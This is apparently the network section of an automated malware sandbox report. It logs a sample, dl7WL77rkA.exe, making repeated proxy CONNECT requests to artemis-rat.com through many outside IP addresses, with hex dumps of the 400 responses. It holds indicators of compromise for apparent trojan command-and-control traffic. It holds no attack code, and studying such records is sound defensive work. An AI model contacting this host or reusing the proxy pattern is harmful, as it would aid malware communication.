                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.908642054 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1374192.168.2.553752162.159.246.135803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.747565985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.908795118 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1375192.168.2.55337098.178.72.21109193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.749219894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1376192.168.2.55364431.148.207.153803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.761409044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.099456072 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1377192.168.2.55364283.243.92.15480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.762885094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1378192.168.2.55367766.228.37.25278413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.769155979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405045986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.202018023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.593286991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.405342102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202124119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998820066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.702166080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1379192.168.2.553618102.132.48.6080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.777966976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.694869995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1380192.168.2.55365940.76.160.14390023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.782234907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1381192.168.2.553724129.213.150.205803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.819437981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1382192.168.2.553657195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.821592093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1383192.168.2.55369924.176.53.18380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.837626934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.445987940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238980055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702491999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.514614105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.352258921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202020884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.796720028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1384192.168.2.553804172.67.182.96803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.858163118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.012917042 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1385192.168.2.553672114.156.77.10780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.858505964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1386192.168.2.553285192.111.130.5170023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.870135069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1387192.168.2.55366754.36.122.16297963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.870498896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.592597961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.702131033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.592946053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.405174017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.202095032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.092616081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1388192.168.2.55380868.71.249.153486063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.887212992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1389192.168.2.553676185.110.190.99803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.887428999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.208940029 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:44 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1390192.168.2.553571203.124.53.12256783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.918139935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1391192.168.2.55374447.243.114.19281803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.919640064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
